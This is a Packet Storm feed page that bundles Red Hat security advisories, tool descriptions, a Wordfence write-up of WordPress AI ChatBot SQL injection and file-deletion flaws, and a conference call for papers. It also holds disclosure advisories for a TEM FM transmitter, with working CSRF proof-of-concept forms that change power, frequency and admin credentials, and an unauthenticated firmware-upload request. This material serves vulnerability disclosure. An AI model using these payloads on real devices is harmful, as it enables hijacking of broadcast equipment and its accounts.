Red Hat Security Advisory 2023-6148-01 - Red Hat Advanced Cluster Management for Kubernetes 2.7.9 General Availability release images, which provide security updates and fix bugs. Issues addressed include a denial of service vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6148.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Advanced Cluster Management 2.7.9 security and bug fix updates  
Advisory ID:        RHSA-2023:6148-01  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6148  
Issue date:         2023-10-26  
Revision:           01  
CVE Names:          CVE-2023-39318  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.7.9 General  
Availability release images, which provide security updates and fix bugs.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.7.9 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console—with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated shortly for this  
release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/release_notes/

Security fix(es):  
CVE-2023-44487 HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack  
CVE-2023-39325 golang: net/http, x/net/http2: rapid stream resets can cause excessive work  
CVE-2023-39321 golang: crypto/tls: panic when processing post-handshake message on QUIC connections  
CVE-2023-39319 golang: html/template: improper handling of special tags within script contexts  
CVE-2023-39318 golang: html/template: improper handling of HTML-like comments within script contexts  
CVE-2023-39322 golang: crypto/tls: lack of a limit on buffered post-handshake

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html-single/install/index#installing

CVEs:

CVE-2023-39318

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6148-01

Red Hat Security Advisory 2023-6145-01 - Multicluster Engine for Kubernetes 2.2.9 General Availability release images, which contain security updates and fix bugs. Issues addressed include a denial of service vulnerability.

The following data is constructed from data provided by Red Hat's json file at:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6145.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Multicluster Engine for Kubernetes 2.2.9 security updates and bug fixes  
Advisory ID:        RHSA-2023:6145-01  
Product:            multicluster engine for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6145  
Issue date:         2023-10-26  
Revision:           01  
CVE Names:          CVE-2023-39318  
====================================================================

Summary: 

Multicluster Engine for Kubernetes 2.2.9 General Availability release images,   
which contain security updates and fix bugs.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE links in the References section.

Description:

Multicluster Engine for Kubernetes 2.2.9 images

Multicluster engine for Kubernetes provides the foundational components  
that are necessary for the centralized management of multiple  
Kubernetes-based clusters across data centers, public clouds, and private  
clouds.

You can use the engine to create new Red Hat OpenShift Container Platform  
clusters or to bring existing Kubernetes-based clusters under management by  
importing them. After the clusters are managed, you can use the APIs that  
are provided by the engine to distribute configuration based on placement  
policy.

Security fix(es):  
CVE-2023-44487 HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack  
CVE-2023-39325 golang: net/http, x/net/http2: rapid stream resets can cause excessive work  
CVE-2023-39321 golang: crypto/tls: panic when processing post-handshake message on QUIC connections  
CVE-2023-39319 golang: html/template: improper handling of special tags within script contexts  
CVE-2023-39318 golang: html/template: improper handling of HTML-like comments within script contexts  
CVE-2023-39322 golang: crypto/tls: lack of a limit on buffered post-handshake

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.7/html/clusters/cluster_mce_overview#installing-while-connected-online-mce

CVEs:

CVE-2023-39318

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6145-01

Red Hat Security Advisory 2023-6143-01 - An update for ztp-site-generate-container, topology-aware-lifecycle-manager and bare-metal-event-relay is now available for Red Hat OpenShift Container Platform 4.14.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6143.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: OpenShift Container Platform 4.14.0 CNF vRAN extras security updateAdvisory ID:        RHSA-2023:6143-01Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6143Issue date:         2023-10-26Revision:           01CVE Names:          CVE-2023-30841====================================================================Summary: An update for ztp-site-generate-container, topology-aware-lifecycle-manager and bare-metal-event-relay is now available for Red Hat OpenShift Container Platform 4.14.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.This advisory contains the extra low-latency container images for Red Hat OpenShift Container Platform 4.14.Security Fix(es):* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)* baremetal-operator: plain-text username and hashed password readable by anyone having a cluster-wide read-access (CVE-2023-30841)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.All OpenShift Container Platform users are advised to upgrade to these updated packages and images.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-30841References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-6143-01

Red Hat Security Advisory 2023-6105-01 - An update is now available for Red Hat JBoss Core Services. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6105.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.57 SP1 security updateAdvisory ID:        RHSA-2023:6105-01Product:            Red Hat JBoss Core ServicesAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6105Issue date:         2023-10-26Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update is now available for Red Hat JBoss Core Services.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products and packaged under Red Hat JBoss Core Services, to allow for faster distribution of updates and for a more consistent update experience.This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.57 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.57, and includes bug fixes and enhancements, which are documented in the Release Notes linked to in the References section.Security Fix(es):* nghttp2: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) [Major Incident] (CVE-2023-44487)A Red Hat Security Bulletin which addresses further details about this flaw is available in the References section.For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-6105-01

GRR Rapid Response is an incident response framework focused on remote live forensics. The goal of GRR is to support forensics and investigations in a fast, scalable manner to allow analysts to quickly triage attacks and perform analysis remotely. GRR consists of 2 parts: client and server. GRR client is deployed on systems that one might want to investigate. On every such system, once deployed, GRR client periodically polls GRR frontend servers for work. "Work" means running a specific action: downloading file, listing a directory, etc. GRR server infrastructure consists of several components (frontends, workers, UI servers) and provides web-based graphical user interface and an API endpoint that allows analysts to schedule actions on clients and view and process collected data.

GRR 3.4.7.1

Clam AntiVirus is an anti-virus toolkit for Unix. The main purpose of this software is the integration with mail servers (attachment scanning). The package provides a flexible and scalable multi-threaded daemon, a command-line scanner, and a tool for automatic updating via Internet. The programs are based on a shared library distributed with the Clam AntiVirus package, which you can use in your own software. This is the LTS source code release.

Clam AntiVirus Toolkit 1.2.1

TEM Opera Plus FM Family Transmitter version 35.45 suffers from a cross site request forgery vulnerability.

CSRF Change Forward Power:  
-------------------------

<html>  
  <body>  
    <form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">  
      <input type="hidden" name="Pwr" value="00100" />  
      <input type="submit" value="Change" />  
    </form>  
  </body>  
</html>

CSRF Change Frequency:  
---------------------

<html>  
  <body>  
    <form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">  
      <input type="hidden" name="Freq" value="95.5" />  
      <input type="submit" value="Change" />  
    </form>  
  </body>  
</html>

CSRF Change User/Pass/Priv Change Admin/User/Pass:  
-------------------------------------------------

<html>  
  <body>  
    <form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">  
      <input type="hidden" name="usr0" value="admin" />  
      <input type="hidden" name="psw0" value="admin" />  
      <input type="hidden" name="usr1" value="operator1" />  
      <input type="hidden" name="psw1" value="operator1" />  
      <input type="hidden" name="lev1" value="1" />  
      <input type="hidden" name="usr2" value="operator2" />  
      <input type="hidden" name="psw2" value="operator2" />  
      <input type="hidden" name="lev2" value="1" />  
      <input type="hidden" name="usr3" value="consulter1" />  
      <input type="hidden" name="psw3" value="consulter1" />  
      <input type="hidden" name="lev3" value="2" />  
      <input type="hidden" name="usr4" value="consulter2" />  
      <input type="hidden" name="psw4" value="consulter2" />  
      <input type="hidden" name="lev4" value="2" />  
      <input type="hidden" name="usr5" value="consulter3" />  
      <input type="hidden" name="psw5" value="consulter3" />  
      <input type="hidden" name="lev5" value="2" />  
      <input type="submit" value="Change" />  
    </form>  
  </body>  
</html>

TEM Opera Plus FM Family Transmitter 35.45 Cross Site Request Forgery

TEM Opera Plus FM Family Transmitter version 35.45 suffers from a remote code execution vulnerability.

    TEM Opera Plus FM Family Transmitter 35.45 Remote Code ExecutionVendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.Product web page: https://www.tem-italy.itAffected version: Software version: 35.45                  Webserver version: 1.7Summary: This new line of Opera plus FM Transmitters combines veryhigh efficiency, high reliability and low energy consumption in compactsolutions. They have innovative functions and features that can eliminatethe costs required by additional equipment: automatic exchange of audiosources, built-in stereo encoder, integrated RDS encoder, parallel I/Ocard, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTPWebserver.Desc: The device allows access to an unprotected endpoint that allowsMPFS File System binary image upload without authentication. The MPFS2file system module provides a light-weight read-only file system thatcan be stored in external EEPROM, external serial Flash, or internalFlash program memory. This file system serves as the basis for theHTTP2 web server module, but is also used by the SNMP module and isavailable to other applications that require basic read-only storagecapabilities. This can be exploited to overwrite the flash programmemory that holds the web server's main interfaces and execute arbitrarycode.Tested on: WebserverVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5799Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php18.08.2023--POST /mpfsupload HTTP/1.1Host: 192.168.1.2:8000Content-Length: 251Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=----joxypoxy2User-Agent: MPFS2_PoC/2.0cAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------joxypoxy2Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"Content-Type: application/octet-streamMPFS...<CGI BINARY PHONE HOME>-----joxypoxy2--HTTP/1.1 200 OKConnection: closeContent-Type: text/html<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>

TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution

WordPress AI ChatBot plugin versions 4.8.9 and below suffer from arbitrary file deletion, remote SQL injection, and directory traversal vulnerabilities.

Vulnerability Details and Technical Analysis

The AI ChatBot plugin provides website owners with a plug and play chat solution that can be expanded upon with customizable FAQs and custom text responses. It provides website users with an interface that allows them to look up order information, leave contact information for later callbacks and can be integrated with OpenAI’s ChatGPT or Google’s DialogFlow.

A lot of the interactions with the chatbot happen via AJAX actions. Many of these actions were made available to unauthenticated users in order to allow them to interact with the chatbot. Other actions required at least subscriber-level access.

Unauthenticated SQL Injection – CVE-2023-5204

Description: Unauthenticated SQL Injection via qc_wpbo_search_response 

Affected Plugin:AI ChatBot

Plugin slug:chatbot

Vendor: QuantumCloud

Affected versions: <= 4.8.9

CVE ID: CVE-2023-5204

CVSS score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Researcher: Marco Wotschka 

Fully Patched Version: 4.9.1

One of the many vulnerabilities we discovered was an unauthenticated SQL Injection. The following two AJAX actions are used for searches during interactions with the chatbot:

add_action( 'wp_ajax_nopriv_wpbo_search_response', 'qc_wpbo_search_response' );

add_action( 'wp_ajax_wpbo_search_response', 'qc_wpbo_search_response' );

The wp_ajax_nopriv_wpbo_search_response AJAX action can be used by users who are not authenticated to WordPress due to the hook utilizing ‘nopriv’. On the other hand, the standard wp_ajax_wpbo_search_response AJAX action can only be used by authenticated users due to the inherent functionality of AJAX actions.

qc_wpbo_search_response 

function qc_wpbo_search_response (shortened for brevity)

The qc_wpbo_search_response function hooked by the aforementioned AJAX actions is used to search within the database for responses containing certain keywords. If the $_POST[‘strid’] parameter is set, a record is retrieved from the wpbot_response table by ID. The $strid variable supplied by the POST parameter can be leveraged for SQL Injection, despite being sanitized using the sanitize_text_field function.

According to the WordPress Developer Resources, the sanitize_text_field function checks for invalid UTF-8; converts single < characters to entities; strips all tags; removes line breaks, tabs, and extra whitespace; strips percent-encoded characters. This does not provide sufficient protection against SQL Injection attempts, and is only intended for Cross-Site Scripting protection. Furthermore, the get_results function used in the above function call does not perform any preparation, nor is there any escaping of the user supplied input passed to the SQL Query. We always recommend the use of the prepare function on SQL queries as it provides adequate escaping on the user-supplied values, which prevents SQL injection from being successful. In addition, ensuring that the $strid is an integer would help prevent a SQL Injection attack from being successful.

The lack of a UNION operation in the above SQL query makes exploiting this vulnerability more difficult, but a time-based blind injection approach using the SLEEP() function and CASE statements can still be used to extract information from the database by observing the duration of individual queries. While tedious, this technique can be used to extract sensitive information from the database. This includes hashed passwords.

Arbitrary File Deletion – CVE-2023-5212

Description:Authenticated (Subscriber+) Arbitrary File Deletion via qcld_openai_delete_training_file 

Affected Plugin: AI ChatBot

Plugin slug: chatbot

Vendor: QuantumCloud

Affected versions: <= 4.8.9

CVE ID:CVE-2023-5212

CVSS score: 9.6 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Researcher: Marco Wotschka 

Fully Patched Version: 4.9.1

The plugin offers the ability to upload training files to OpenAI. An arbitrary file deletion vulnerability existed in the  qcld_openai_delete_training_file  function invoked via the following AJAX action:

add_action('wp_ajax_qcld_openai_delete_training_file',[$this,'qcld_openai_delete_training_file']);

delete_training_file 

function qcld_openai_delete_training_file

This vulnerable function accepts a file path via the $_POST[‘file’] parameter and checks whether the file exists. If it does, the function adjusts permissions on the file in such a way that it can be removed and proceeds to delete it. This function misses a capability check to ensure that the user performing the action has proper privileges, as well as a nonce check to ensure that the action is performed intentionally. and is thus vulnerable to Missing Authorization and Cross-Site Request Forgery.

Furthermore, no check is performed ensuring that the file is an OpenAI training file and that it resides in a location or directory where training files are expected to be located. This could allow an authenticated attacker with subscriber-level privileges or higher to remove the wp-config.php file of an affected site, which would invoke the WordPress installation script on the next site visit and could lead to a complete site takeover.

The file path passed via the $_POST[‘file’] parameter could also point to a file outside of the affected website, thus enabling the deletion of wp-config.php files of other sites in shared hosting environments. Deleting wp-config.php forces the site into a setup state, at which point an attacker can take over the site by pointing it to a database under their control. Of course, attackers are not limited to deleting PHP files either as long as the web server can change file permissions and delete the file.

Version 4.9.1 removed this function as well as the corresponding AJAX action. Version 4.9.2 reintroduced the vulnerable function and action hook, which were both again removed in version 4.9.3.

Directory Traversal to Arbitrary File Write – CVE-2023-5241

Description: Authenticated (Subscriber+) Directory Traversal to Arbitrary File Write via qcld_openai_upload_pagetraining_file 

Affected Plugin: AI ChatBot

Plugin slug: chatbot

Vendor:QuantumCloud

Affected versions: <= 4.8.9

CVE ID: CVE-2023-5241

CVSS score: 9.6 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H

Researcher: Marco Wotschka 

Fully Patched Version: 4.9.1

We also discovered an arbitrary file write vulnerability which exists in the qcld_openai_upload_pagetraining_file function. The entire function is rather long which is why we won’t display it here in its entirety.

upload_training_file 

function qcld_openai_upload_pagetraining_file (shortened for brevity)

The function expects a filename to be passed as a  $_POST[‘filename’]  parameter, which is sanitized using the sanitize_text_field function. The $file variable is used to determine the location of a file in the wp-content/uploads/qcldopenai_site_training/ directory. If the file exists, the function proceeds to declare a variable called $split_file, creates a file handle $qcld_openai_json_file and opens the file in append mode. This means that the file is not overwritten but anything written to the file is instead appended.

It is not immediately clear what the purpose of this part of the function is since it simply appends the contents that are already in the file to the end of the file until the length of the content that is added exceeds $this->wpaicg_max_file_size or the entire file has been duplicated.

The corresponding if-statement that determines when to terminate writing to the file looks as follows:

if(mb_strlen($qcld_openai_content, '8bit') >$this->wpaicg_max_file_size)

In a default installation $this->wpaicg_max_file_size is not defined and therefore NULL. Hence, in such scenarios the function adds the first line of the file specified by the user to the end of the file. Since NULL is interpreted as zero in a comparison statement like this, any positive file size will suffice to break out of this part of the function.

Unfortunately, this code is vulnerable to Directory Traversal via the filename parameter. If the filename that is passed is a relative path to wp-config.php, the file handle will ultimately point to the site’s wp-config.php file. An authenticated attacker with subscriber-privileges or higher could utilize this fact to append the first line of its content to the file wp-config.php, which would be <?php.

While an attacker does not have any influence on the data that is written, in most cases a <?php could be written to the end of a targeted PHP file, which can lead to catastrophic consequences as the added PHP tag may result in an error such as

Parse error: syntax error, unexpected token "<", expecting end of file

This prevents the site from loading properly and can be used to append to any PHP file (or other files) including those in shared hosting environments leading to Denial of Service (DoS). One way to prevent Directory Traversal is to use the sanitize_file_name function, which removes special characters including slashes and leading dots from the file name.

Version 4.9.1 removed this function as well as the corresponding AJAX action. Version 4.9.2 reintroduced the vulnerable function and action hook, which were both again removed in version 4.9.3.

Numerous Other Missing Authorization and Cross-Site Request Forgery Vulnerabilities

In addition to the vulnerabilities outlined above, we discovered several AJAX actions without proper capability checks, which made it possible for authenticated attackers with minimal access, such as subscribers, to invoke those actions. Several of the functions were also missing nonce verification, which would make it possible for attackers to forge requests on behalf of a site administrator, or any other authenticated user considering capability checks were also missing.

However, these vulnerabilities had minimal impact and led to the exposure of information such as user order details and user names, the download and extraction of a zip used by the plugin (not arbitrary zip files), cache deletion, as well as starting and stopping of search indexing jobs to name a few. The severity of those actions is lower than the ones we detailed above.

Timeline

September 25-28, 2023 – The Wordfence Threat Intelligence team discovers several vulnerabilities in the AI ChatBot plugin.

September 28, 2023 – We initiate contact with the plugin developer.

September 29, 2023 – We release a firewall rule to protect Wordfence Premium , Wordfence Care , and Wordfence Response  customers and send the full disclosure to the plugin developer. Receipt of the disclosure is acknowledged.

October 10, 2023 – A fixed version (4.9.1) of the plugin that patches all reported vulnerabilities is released.

October 18, 2023 – Several of the vulnerabilities are reintroduced in version 4.9.2. We inform the vendor about this.

October 19, 2023 – Version 4.9.3 patches the vulnerabilities again.

October 29, 2023 – The firewall rule becomes available to free Wordfence users

Conclusion

In this blog post we covered an Unauthenticated SQL Injection vulnerability (affecting versions <= 4.8.9), as well as an Arbitrary File Write vulnerability and an Arbitrary File Deletion vulnerability (affecting versions <= 4.8.9 and 4.9.2). The SQL Injection vulnerability allows unauthenticated attackers to extract sensitive information from the database using a time-based blind injection approach, which could ultimately lead to exposure of admin credentials and site takeover.

The Arbitrary File Write vulnerability can be utilized by authenticated attackers to append opening PHP tags (in default configurations) to any file including the wp-config.php file, which can lead to Denial of Service (DoS). The Arbitrary File Deletion vulnerability can be used by authenticated attackers to delete any file on the web server offering the possibility of complete site takeovers.

All Wordfence running Wordfence Premium , Wordfence Care , and Wordfence Response , have been protected against these vulnerabilities as of September 29, 2023. Users still using the free version of Wordfence will receive the same protection on October 29, 2023.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as these vulnerabilities pose a significant risk.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence  and potentially earn a spot on our leaderboard .

WordPress AI ChatBot 4.8.9 SQL Injection / Traversal / File Deletion

BOOTSTRAP24, a hacker conference with that is heavy with hands-on participation, will take play February 24, 2024 in Austin, Texas, USA. The prior evening will be a mixer.

    -o- Ringzer0 BOOTSTRAP24 Austin Call For Papers -o-## Dates, Deadlines and Venue:- BOOTSTRAP24 Conference: 24 February 2024- BOOTLOADER Mixer Evening: 23 February 2024- CFP Closes 3 November 2023- Final Selection by 5 November 2023- Talks and Workshops should be submitted tohttps://cfp.ringzer0.training/ringzer0-bootstrap24-austin/cfp## About Ringzer0 BOOTSTRAP24 Austin- All new hacker conference heavy on hands-on participation!- A single day event that features research presentations, hands-onworkshops and cyber challenges.- The BOOTLOADER Mixer is a unique evening of education, engagement andentertainment featuring an opening talk, lightning talks and interactionwith instructors, speakers and the Austin hacker community## Topics of focus- Reverse Engineering / Debugging- Vulnerability Discovery- Exploit Development- AI / LLMs in the offensive/defensive context- Fuzzing- Hardware and IoT- Telecom / Baseband / Cellular- Wireless / Bluetooth / RF- Automotive / Drone- Application Security / Mobile apps- OS Internals- or define your own unique category!## Submission options- Research Presentations (45 minutes)- Hands-on Workshops (90 minutes)## Benefits for Speakers and Workshop Instructors- Interact with some of the best instructors and speakers in thecybersecurity industry- Present your research or tools to an active cybersecurity community inAustin- 2 nights of hotel stay in Austin Texas- Up to USD 500 for travel reimbursement- Invitation to the Speakers and VIP Social evening on Thursday 22 February2024- Several informal social events organised by Ringzer0 in Austin(distilleries, breweries, tex-mex food tours and more. Austin is a veryvibrant city!)## Notes for participants- Talks will be recorded on camera and shared on the Internet. By acceptinga speaking slot you are committing to your talk being recorded and sharedon video sites. If this is a problem for you, please say so in yoursubmission.- Please inform us of any disability, allergy or other needs you may havewith your submission so we can accommodate them.

Source

Packet Storm